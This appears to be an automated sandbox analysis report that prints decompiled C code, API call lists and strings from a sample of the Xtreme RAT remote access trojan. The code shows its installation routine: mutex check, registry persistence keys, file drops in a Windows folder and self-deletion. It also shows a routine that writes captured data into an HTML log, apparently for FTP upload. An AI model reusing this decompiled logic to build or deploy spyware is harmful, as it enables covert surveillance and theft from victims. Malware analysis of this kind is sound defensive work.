				char* _t220;
				intOrPtr _t221;
				intOrPtr _t223;
				intOrPtr _t226;
				char* _t229;
				WCHAR* _t235;
				void* _t287;
				void* _t301;
				WCHAR* _t344;
				void* _t346;
				intOrPtr* _t419;
				intOrPtr _t428;
				intOrPtr _t435;
				WCHAR* _t462;
				void* _t464;
				void* _t465;
				intOrPtr _t467;
				intOrPtr _t468;
				void* _t476;

				_t467 = _t468;
				_t346 = 0x2c5;
				do {
					_push(0);
					_push(0);
					_t346 = _t346 - 1;
					_t471 = _t346;
				} while (_t346 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t344 = _a4;
				_push(_t467);
				_push(0x1000c850);
				 *[fs:eax] = _t468;
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("kernel32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("mpr.dll");
				LoadLibraryA("version.dll");
				LoadLibraryA("comctl32.dll");
				LoadLibraryA("gdi32.dll");
				LoadLibraryA("opengl32.dll");
				LoadLibraryA("user32.dll");
				LoadLibraryA("wintrust.dll");
				LoadLibraryA("msimg32.dll");
				E100050D8();
				_t464 =  &(_t344[0x108]);
				memcpy( &_v5036, _t464, 0x4e4 << 2);
				_t462 = _t464 + 0x9c8;
				E10005664( &_v5564);
				E100038E0( &_v5040, 0x105,  &_v5564);
				E10003928( &_v5040, 0x105, L"\\Microsoft\\Windows\\", _t471);
				_t164 = E10005690(E1000390C(_v5040),  *[fs:eax]);
				_t472 = _t164 - 1;
				if(_t164 != 1) {
					E10005664( &_v5564);
					E100038E0( &_v5592, 0x105,  &_v5564);
					_push(_v5592);
					_push(0x1000c958);
					E100038E0( &_v5596, 0x3d,  &_v1026);
					_push(_v5596);
					_push(L".cfg");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5600, 0x105,  &_v5564);
					_push(_v5600);
					_push(0x1000c958);
					E100038E0( &_v5604, 0x3d,  &_v1026);
					_push(_v5604);
					_push(L".xtr");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5608, 0x105,  &_v5564);
					_push(_v5608);
					_push(0x1000c958);
					E100038E0( &_v5612, 0x3d,  &_v1026);
					_push(_v5612);
					_push(L".dat");
					E100039EC();
				} else {
					E10005664( &_v5564);
					E100038E0( &_v5568, 0x105,  &_v5564);
					_push(_v5568);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5572, 0x3d,  &_v1026);
					_push(_v5572);
					_push(L".cfg");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5576, 0x105,  &_v5564);
					_push(_v5576);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5580, 0x3d,  &_v1026);
					_push(_v5580);
					_push(L".xtr");
					E100039EC();
					E10005664( &_v5564);
					E100038E0( &_v5584, 0x105,  &_v5564);
					_push(_v5584);
					_push(L"\\Microsoft\\Windows\\");
					E100038E0( &_v5588, 0x3d,  &_v1026);
					_push(_v5588);
					_push(L".dat");
					E100039EC();
				}
				E10006B14(0x2f, _t344, 0x3a, 0x20, _t462, _t464,  &_v5616);
				E100034B0( &_v5628, 0x3d,  &_v1026);
				E1000352C( &_v5624, _v5628, "SOFTWARE\\");
				E100038FC( &_v5620, _v5624);
				E1000577C(0x80000001, _t344, L"ServerStarted", _v5620, _t464, _t472, 2, _v5616);
				_v24 = E10004DF0(0, 0,  &_v1026);
				if(GetLastError() == 0xb7) {
					ExitProcess(0);
				}
				E100038E0( &_v5632, 0x105, _t344);
				_t361 =  &_v8;
				E100099F8(_t344,  &_v8,  &_v5036, _t462, _t464);
				E10009E74(_t344,  &_v5036, _t462, _t464);
				_t474 = _v2011 - 1;
				if(_v2011 == 1) {
					E10005D78(_v8, _t344,  &_v8,  &_v5636, _t462, _t464, _t474);
					E10005F1C(_v5636, _t344,  &_v8, _t464);
					E10005F1C(_v8, _t344, _t361, _t464);
				}
				_t475 = _v1028 - 1;
				if(_v1028 == 1) {
					E100034B0( &_v5648, 0x3d,  &_v1026);
					E1000352C( &_v5644, _v5648, "SOFTWARE\\");
					E100038FC( &_v5640, _v5644);
					E1000577C(0x80000001, _t344, L"ServerName", _v5640, _t464, _t475, 2, _v8);
				}
				_t476 = _v2012 - 1;
				if(_t476 == 0) {
					E100038E0( &_v5652, 0x105, _t344);
					E10003A34(_v5652, _v8);
					if(_t476 != 0) {
						E100038E0( &_v5656, 0x105, _t344);
						_push(_v5656);
						E10005954(0,  &_v5660);
						_pop(_t301);
						E10003A34(_t301, _v5660);
						if(0 != 0) {
							_t464 = 0;
							while(1) {
								_t462 = _t344;
								if(E10005CA4(_t462) != 1 || _t464 >= 5) {
									goto L18;
								}
								SetFileAttributesW(_t462, 0x80);
								DeleteFileW(_t462);
								Sleep(0x1f4);
								_t464 = _t464 + 1;
								__eflags = _t464;
							}
						}
					}
				}
				L18:
				_t207 =  *0x1000e10c; // 0x1000f80c
				E10003770(_t207);
				_t209 =  *0x1000e12c; // 0x1000f6a4
				E100038E0(_t209, 0x3d,  &_v656);
				_t211 =  *0x1000e120; // 0x1000f6c2
				 *_t211 = _v659;
				_t212 =  *0x1000e100; // 0x1000f6a8
				E100038E0(_t212, 0x3d,  &_v534);
				_t214 =  *0x1000e110; // 0x1000f6ac
				E100038E0(_t214, 0x3d,  &_v412);
				_t216 =  *0x1000e114; // 0x1000f6b0
				E100038E0(_t216, 0x3d,  &_v290);
				_t218 =  *0x1000e11c; // 0x1000f6bc
				 *_t218 = _v168;
				_t219 =  *0x1000e124; // 0x1000f6c0
				 *_t219 = _v164;
				_t220 =  *0x1000e118; // 0x1000f6c1
				 *_t220 = _v658;
				_t221 =  *0x1000e108; // 0x1000f6b4
				E100038E0(_t221, 0x3d,  &_v1026);
				_t223 =  *0x1000e104; // 0x1000f6b8
				E100038E0(_t223, 0x3d,  &_v162);
				if(_v660 == 1) {
					E100093E4(_t344, _t462, _t464);
				}
				if(_v40 == 1) {
					E1000A480(E1000B634(_t344, _v8, 1, _t464));
				}
				_t226 =  *0x1000a4e8; // 0x1000a534
				E1000A480(E1000AA54(_t226, _t344,  &_v5036, 1, _t462, _t464, _v20));
				while(1) {
					_t229 =  *0x1000e130; // 0x1000e0bc
					_t482 =  *_t229;
					if( *_t229 != 0) {
						break;
					}
					E10006058();
				}
				E10008D4C(_t229);
				_t419 =  *0x1000e10c; // 0x1000f80c
				E100037D0( &_v12,  *_t419);
				_t235 = E1000390C(_v16);
				_t345 = _t235;
				SetFileAttributesW(_t235, 0x80);
				E10005EB4(_t235,  &_v5036, 0x1390, 0);
				E100034B0( &_v5672, 0x3d,  &_v1026);
				E1000352C( &_v5668, _v5672, "SOFTWARE\\");
				E100038FC( &_v5664, _v5668);
				E1000577C(0x80000001, _t345, L"InstalledServer", _v5664, _t464, _t482, 2, _v8);
				_push(E1000391C(_v12) + _t249);
				E10004584();
				_push(E1000391C(_v12) + _t254);
				E100050D0(_v28, E1000390C(_v12));
				if(0 == 0) {
					_t465 = 0;
					do {
						E10005954(0,  &_v5676);
						_t287 = E1000BD60(_v28, _t345, _v5676, _t462, _t465);
						_t465 = _t465 + 1;
					} while (_t465 <= 0xa && _t287 != 1);
				}
				CloseHandle(_v24);
				ExitProcess(0);
				_pop(_t428);
				 *[fs:eax] = _t428;
				_push(E1000C85A);
				E10003770( &_v5676);
				E100032F0( &_v5672, 2);
				E10003788( &_v5664, 4);
				E100032F0( &_v5648, 2);
				E10003788( &_v5640, 3);
				E100032F0( &_v5628, 2);
				E10003788( &_v5620, 0xe);
				E10003770( &_v5040);
				_t435 =  *E1000BD14; // 0x1000bd18
				E10004590( &_v28, _t435);
				return E10003788( &_v20, 4);
			}

0x1000c081
0x1000c083
0x1000c088
0x1000c088
0x1000c08a
0x1000c08c
0x1000c08c
0x1000c08c
0x1000c08f
0x1000c090
0x1000c091
0x1000c092
0x1000c097
0x1000c098
0x1000c0a0
0x1000c0a8
0x1000c0b2
0x1000c0bc
0x1000c0c6
0x1000c0d0
0x1000c0da
0x1000c0e4
0x1000c0ee
0x1000c0f8
0x1000c102
0x1000c10c
0x1000c11c
0x1000c121
0x1000c132
0x1000c132
0x1000c13a
0x1000c150
0x1000c160
0x1000c170
0x1000c175
0x1000c177
0x1000c298
0x1000c2ae
0x1000c2b3
0x1000c2b9
0x1000c2cf
0x1000c2d4
0x1000c2da
0x1000c2e7
0x1000c2f2
0x1000c308
0x1000c30d
0x1000c313
0x1000c329
0x1000c32e
0x1000c334
0x1000c341
0x1000c34c
0x1000c362
0x1000c367
0x1000c36d
0x1000c383
0x1000c388
0x1000c38e
0x1000c39d
0x1000c17d
0x1000c183
0x1000c199
0x1000c19e
0x1000c1a4
0x1000c1ba
0x1000c1bf
0x1000c1c5
0x1000c1d2
0x1000c1dd
0x1000c1f3
0x1000c1f8
0x1000c1fe
0x1000c214
0x1000c219
0x1000c21f
0x1000c22c
0x1000c237
0x1000c24d
0x1000c252
0x1000c258
0x1000c26e
0x1000c273
0x1000c279
0x1000c288
0x1000c288
0x1000c3b5
0x1000c3d4
0x1000c3ea
0x1000c3fb
0x1000c410
0x1000c425
0x1000c432
0x1000c436
0x1000c436
0x1000c448
0x1000c453
0x1000c45c
0x1000c46a
0x1000c46f
0x1000c476
0x1000c481
0x1000c48c
0x1000c494
0x1000c494
0x1000c499
0x1000c4a0
0x1000c4b9
0x1000c4cf
0x1000c4e0
0x1000c4f5
0x1000c4f5
0x1000c4fa
0x1000c501
0x1000c514
0x1000c522
0x1000c527
0x1000c536
0x1000c541
0x1000c54a
0x1000c555
0x1000c556
0x1000c55b
0x1000c55d
0x1000c57d
0x1000c57d
0x1000c588
0x00000000
0x00000000
0x1000c567
0x1000c56d
0x1000c577
0x1000c57c
0x1000c57c
0x1000c57c
0x1000c57d
0x1000c55b
0x1000c527
0x1000c58f
0x1000c58f
0x1000c594
0x1000c599
0x1000c5a9
0x1000c5ae
0x1000c5b9
0x1000c5bb
0x1000c5cb
0x1000c5d0
0x1000c5e0
0x1000c5e5
0x1000c5f5
0x1000c5fa
0x1000c605
0x1000c607
0x1000c612
0x1000c614
0x1000c61f
0x1000c621
0x1000c631
0x1000c636
0x1000c646
0x1000c652
0x1000c654
0x1000c654
0x1000c65d
0x1000c66e
0x1000c66e
0x1000c67f
0x1000c689
0x1000c695
0x1000c695
0x1000c69a
0x1000c69d
0x00000000
0x00000000
0x1000c690
0x1000c690
0x1000c69f
0x1000c6a7
0x1000c6af
0x1000c6bc
0x1000c6c1
0x1000c6c4
0x1000c6d8
0x1000c6f4
0x1000c70a
0x1000c71b
0x1000c730
0x1000c73f
0x1000c74e
0x1000c760
0x1000c76f
0x1000c778
0x1000c77a
0x1000c77c
0x1000c784
0x1000c792
0x1000c797
0x1000c798
0x1000c77c
0x1000c7a5
0x1000c7ac
0x1000c7b3
0x1000c7b6
0x1000c7b9
0x1000c7c4
0x1000c7d4
0x1000c7e4
0x1000c7f4
0x1000c804
0x1000c814
0x1000c824
0x1000c82f
0x1000c837
0x1000c83d
0x1000c84f

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000C0A8
LoadLibraryA.KERNEL32(kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000,00000000), ref: 1000C0B2
LoadLibraryA.KERNEL32(shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000,00000000), ref: 1000C0BC
LoadLibraryA.KERNEL32(mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe,00000000), ref: 1000C0C6
LoadLibraryA.KERNEL32(version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E,C:\Users\user\Desktop\7FW4ce2RDy.exe), ref: 1000C0D0
LoadLibraryA.KERNEL32(comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000,?,1000D71E), ref: 1000C0DA
LoadLibraryA.KERNEL32(gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000), ref: 1000C0E4
LoadLibraryA.KERNEL32(opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000,00000000), ref: 1000C0EE
LoadLibraryA.KERNEL32(user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000,00000000), ref: 1000C0F8
LoadLibraryA.KERNEL32(wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000,00000000), ref: 1000C102
LoadLibraryA.KERNEL32(msimg32.dll,wintrust.dll,user32.dll,opengl32.dll,gdi32.dll,comctl32.dll,version.dll,mpr.dll,shell32.dll,kernel32.dll,advapi32.dll,00000000,1000C850,?,1000F834,00000000), ref: 1000C10C

Part of subcall function 10006B14: GetLocalTime.KERNEL32(?,00000000,10006CD2,?,?,?,?,00000000,00000000,0000003A,?,1000C3BA,?,.dat,?,1000C958), ref: 10006B42

Part of subcall function 1000577C: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 100057C2
Part of subcall function 1000577C: RegSetValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057EE
Part of subcall function 1000577C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,00000000,00000000,10005825,?,1000F834), ref: 100057FD

Part of subcall function 10004DF0: CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06

GetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?,.cfg,?), ref: 1000C428
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?,.cfg), ref: 1000C436
SetFileAttributesW.KERNEL32(?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958,?), ref: 1000C567
DeleteFileW.KERNEL32(?,?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 1000C56D
Sleep.KERNEL32(000001F4,?,?,00000080,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?), ref: 1000C577
SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 1000C6C4
CloseHandle.KERNEL32(?), ref: 1000C7A5
ExitProcess.KERNEL32(00000000,?), ref: 1000C7AC

Part of subcall function 100093E4: ShowWindow.USER32(00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002,?,?), ref: 10009443
Part of subcall function 100093E4: SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002), ref: 10009467
Part of subcall function 100093E4: CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000), ref: 10009486
Part of subcall function 100093E4: GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 100094C3
Part of subcall function 100093E4: SetFileAttributesW.KERNEL32(00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 10009554

Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B

Part of subcall function 10003770: SysFreeString.OLEAUT32(1000CFDC), ref: 1000377E

Strings

msimg32.dll, xrefs: 1000C107
InstalledServer, xrefs: 1000C726
SOFTWARE\, xrefs: 1000C3E5, 1000C4CA, 1000C705
wintrust.dll, xrefs: 1000C0FD
kernel32.dll, xrefs: 1000C0AD
opengl32.dll, xrefs: 1000C0E9
gdi32.dll, xrefs: 1000C0DF
mpr.dll, xrefs: 1000C0C1
.cfg, xrefs: 1000C1C5, 1000C2DA
advapi32.dll, xrefs: 1000C0A3
.dat, xrefs: 1000C279, 1000C38E
ServerName, xrefs: 1000C4EB
shell32.dll, xrefs: 1000C0B7
version.dll, xrefs: 1000C0CB
\Microsoft\Windows\, xrefs: 1000C15B, 1000C1A4, 1000C1FE, 1000C258
user32.dll, xrefs: 1000C0F3
.xtr, xrefs: 1000C21F, 1000C334
ServerStarted, xrefs: 1000C406
comctl32.dll, xrefs: 1000C0D5

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad$File$Attributes$Create$CloseExitFreeProcessString$DeleteErrorHandleLastLocalMutexShowSizeSleepTimeValueWindow
String ID: .cfg$.dat$.xtr$InstalledServer$SOFTWARE\$ServerName$ServerStarted$\Microsoft\Windows\$advapi32.dll$comctl32.dll$gdi32.dll$kernel32.dll$mpr.dll$msimg32.dll$opengl32.dll$shell32.dll$user32.dll$version.dll$wintrust.dll
API String ID: 3227317601-3293355523
Opcode ID: b3639d15e6b66cfdcbc8dbfa1c87ea71f727a03fb1ab0cbb14dc5b81470b7835
Instruction ID: 1bb01a822c3cd363219a61f58cecc4d3cd4d7df1aa5892b4b649a7b9097d74e2
Opcode Fuzzy Hash: b3639d15e6b66cfdcbc8dbfa1c87ea71f727a03fb1ab0cbb14dc5b81470b7835
Instruction Fuzzy Hash: 58128D7890025D9BEB21DB50CC82EDEB3B9EF84381F4080E5E5096B299DB71BF858F55

Uniqueness

Uniqueness Score: -1.00%

Function 10008DA4, Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 218
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10008DA4(void* __eax, void* __ebx, WCHAR* __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* _v12;
				struct _OVERLAPPED* _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				struct _OVERLAPPED* _v32;
				struct _OVERLAPPED* _v36;
				char _v37;
				void _v38;
				char _v44;
				char _v48;
				char _v52;
				void* _t58;
				long _t61;
				long _t62;
				int _t63;
				long _t64;
				long _t67;
				void* _t68;
				void* _t79;
				void* _t81;
				int _t83;
				long _t84;
				void* _t96;
				long _t117;
				void* _t125;
				intOrPtr _t132;
				intOrPtr _t135;
				struct _OVERLAPPED* _t138;
				struct _OVERLAPPED* _t139;
				intOrPtr _t144;
				void* _t148;
				WCHAR* _t150;
				void* _t153;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t150 = __ecx;
				_v8 = __edx;
				_t148 = __eax;
				_push(_t153);
				_push(0x1000907b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153 + 0xffffffd0;
				if( *0x1000e0b8 != 0xffffffff) {
					_v36 = 0;
					_v32 = 0;
					_t58 =  *0x1000e0b8; // 0x0
					_v20 = GetFileSize(_t58, 0);
					_v16 = 0;
					if(_v16 != 0) {
						if(__eflags > 0) {
							goto L5;
						}
					} else {
						if(_v20 > 0) {
							L5:
							_v36 = _v20;
							_v32 = _v16;
						}
					}
					if(_v32 != 0) {
						if(__eflags > 0) {
							goto L10;
						}
					} else {
						if(_v36 > 0) {
							L10:
							 *0x1000f6c4 = E10006788(0, _t148, _t150, __eflags);
							 *0x1000f6c8 = 0;
							_t61 =  *0x1000f6c4; // 0x0
							_t138 =  *0x1000f6c8; // 0x0
							__eflags = _t138 - _v32;
							if(__eflags != 0) {
								if(__eflags <= 0) {
									goto L15;
								} else {
									goto L14;
								}
							} else {
								__eflags = _t61 - _v36;
								if(_t61 <= _v36) {
									L15:
									_t62 =  *0x1000f6c4; // 0x0
									_t139 =  *0x1000f6c8; // 0x0
									__eflags = _t139 - _v32;
									if(_t139 != _v32) {
										goto L17;
									} else {
										__eflags = _t62 - _v36;
										if(_t62 != _v36) {
											goto L17;
										}
									}
								} else {
									L14:
									 *0x1000f6c4 = 0;
									 *0x1000f6c8 = 0;
									L17:
									__eflags =  *0x1000f688;
									if( *0x1000f688 != 0) {
										_t63 =  *0x1000f694; // 0xc1bc
										_t64 =  *0x1000f688; // 0x0
										SendMessageA(E1000662C(_t64), _t63, 0, 0);
										_t67 =  *0x1000f6c4; // 0x0
										_t68 =  *0x1000e0b8; // 0x0
										SetFilePointer(_t68, _t67, 0, 0);
										asm("sbb edx, [0x1000f6c8]");
										E10003BE4( &_v12, E10003FD4(_v36 -  *0x1000f6c4, _v32, 2, 0));
										_t79 =  *0x1000e0b8; // 0x0
										ReadFile(_t79, _v12, _v36 -  *0x1000f6c4,  &_v24, 0);
										_t81 =  *0x1000e0b8; // 0x0
										SetFilePointer(_t81, 0, 0, 2);
										_t83 =  *0x1000f698; // 0x0
										_t84 =  *0x1000f688; // 0x0
										SendMessageA(E1000662C(_t84), _t83, 0, 0);
										_push(L"<html>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html;charset=UTF-8\">\r\n<head>\r\n<title>Xtreme RAT</title>\r\n</head>\r\n<body>");
										_push(_v12);
										_push(L"</body>");
										_push(0x100091ac);
										_push(L"</html>");
										E100039EC();
										SetFileAttributesW(_t150, 0x80);
										DeleteFileW(_t150);
										_t125 = CreateFileW(_t150, 0x40000000, 0, 0, 2, 0, 0);
										__eflags = _t125 - 0xffffffff;
										if(_t125 != 0xffffffff) {
											_v38 = 0xff;
											_v37 = 0xfe;
											WriteFile(_t125,  &_v38, 2,  &_v24, 0);
											_t117 = E1000391C(_v12) + _t116;
											__eflags = _t117;
											WriteFile(_t125, _v12, _t117,  &_v24, 0);
										}
										CloseHandle(_t125);
										_t130 = _t150;
										_t143 = _v8;
										_t96 = E100068EC(_t148, _t150, _v8, _a4, _a8, _a12);
										_t126 = _t96;
										__eflags = _t96 - 1;
										if(__eflags == 0) {
											 *0x1000f6c4 = _v36;
											 *0x1000f6c8 = _v32;
											E10006710( &_v44, _t130, _t143,  *0x1000f6c4,  *0x1000f6c8);
											_t132 =  *0x1000f6b4; // 0x0
											E10003988( &_v48, _t132, L"SOFTWARE\\", __eflags);
											E1000577C(0x80000001, _t126, L"LastSize", _v48, _t150, __eflags, 2, _v44);
										}
										_t144 =  *0x1000f684; // 0x0
										E10003988( &_v52, 0x100091fc, _t144, __eflags);
										DeleteFileW(E1000390C(_v52));
									}
								}
							}
						} else {
						}
					}
				}
				_pop(_t135);
				 *[fs:eax] = _t135;
				_push(E10009082);
				E10003788( &_v52, 3);
				return E10003770( &_v12);
			}

0x10008daa
0x10008dab
0x10008dac
0x10008daf
0x10008db2
0x10008db5
0x10008db8
0x10008dbb
0x10008dbd
0x10008dc0
0x10008dc4
0x10008dc5
0x10008dca
0x10008dcd
0x10008dd9
0x10008ddf
0x10008de6
0x10008def
0x10008dfc
0x10008dff
0x10008e06
0x10008e10
0x00000000
0x00000000
0x10008e08
0x10008e0c
0x10008e12
0x10008e15
0x10008e1b
0x10008e1b
0x10008e0c
0x10008e22
0x10008e2f
0x00000000
0x00000000
0x10008e24
0x10008e28
0x10008e35
0x10008e3a
0x10008e40
0x10008e46
0x10008e4c
0x10008e52
0x10008e55
0x10008e5e
0x00000000
0x00000000
0x00000000
0x00000000
0x10008e57
0x10008e57
0x10008e5a
0x10008e76
0x10008e76
0x10008e7c
0x10008e82
0x10008e85
0x00000000
0x10008e87
0x10008e87
0x10008e8a
0x00000000
0x00000000
0x10008e8a
0x10008e5c
0x10008e60
0x10008e60
0x10008e6a
0x10008e90
0x10008e90
0x10008e97
0x10008ea1
0x10008ea7
0x10008eb2
0x10008ebb
0x10008ec1
0x10008ec7
0x10008edc
0x10008eec
0x10008f05
0x10008f0b
0x10008f16
0x10008f1c
0x10008f25
0x10008f2b
0x10008f36
0x10008f3b
0x10008f40
0x10008f43
0x10008f48
0x10008f4d
0x10008f5a
0x10008f65
0x10008f6b
0x10008f85
0x10008f87
0x10008f8a
0x10008f8c
0x10008f90
0x10008fa1
0x10008fb4
0x10008fb4
0x10008fbc
0x10008fbc
0x10008fc2
0x10008fd3
0x10008fd5
0x10008fda
0x10008fdf
0x10008fe1
0x10008fe4
0x10008fe9
0x10008ff2
0x10009007
0x10009015
0x10009020
0x10009032
0x10009032
0x1000903f
0x10009045
0x10009053
0x10009053
0x10008e97
0x10008e5a
0x00000000
0x10008e2a
0x10008e28
0x10008e22
0x1000905a
0x1000905d
0x10009060
0x1000906d
0x1000907a

APIs

GetFileSize.KERNEL32(00000000,00000000,00000000,1000907B), ref: 10008DF5
SendMessageA.USER32(00000000,0000C1BC,00000000,00000000), ref: 10008EB2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,0000C1BC,00000000,00000000,00000000,00000000,00000000,1000907B), ref: 10008EC7
ReadFile.KERNEL32(00000000,?,-1000F6C4,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,0000C1BC,00000000,00000000,00000000), ref: 10008F0B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,-1000F6C4,?,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000), ref: 10008F1C
SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10008F36
SetFileAttributesW.KERNEL32(?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000), ref: 10008F65
DeleteFileW.KERNEL32(?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002), ref: 10008F6B
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>,00000000), ref: 10008F80
WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>), ref: 10008FA1
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 10008FBC
CloseHandle.KERNEL32(00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?,<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>), ref: 10008FC2
DeleteFileW.KERNEL32(00000000,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,</html>,100091AC,</body>,?), ref: 10009053

Strings

LastSize, xrefs: 10009028
</body>, xrefs: 10008F43
</html>, xrefs: 10008F4D
FTP, xrefs: 1000903A
<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>, xrefs: 10008F3B
SOFTWARE\, xrefs: 1000901B

Memory Dump Source

Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: File$DeleteMessagePointerSendWrite$AttributesCloseCreateHandleReadSize
String ID: </body>$</html>$<html><meta http-equiv="Content-Type" content="text/html;charset=UTF-8"><head><title>Xtreme RAT</title></head><body>$FTP$LastSize$SOFTWARE\
API String ID: 1838766879-265700797
Opcode ID: f4d93d19cd06cdd413e3f82dc448961f8a6b8c18b0a0675b136e39283c67b9ef
Instruction ID: 9ae569672a167bc613e47318ba2929e521b2e386b238916fb1c1f90ba9e27590
Opcode Fuzzy Hash: f4d93d19cd06cdd413e3f82dc448961f8a6b8c18b0a0675b136e39283c67b9ef
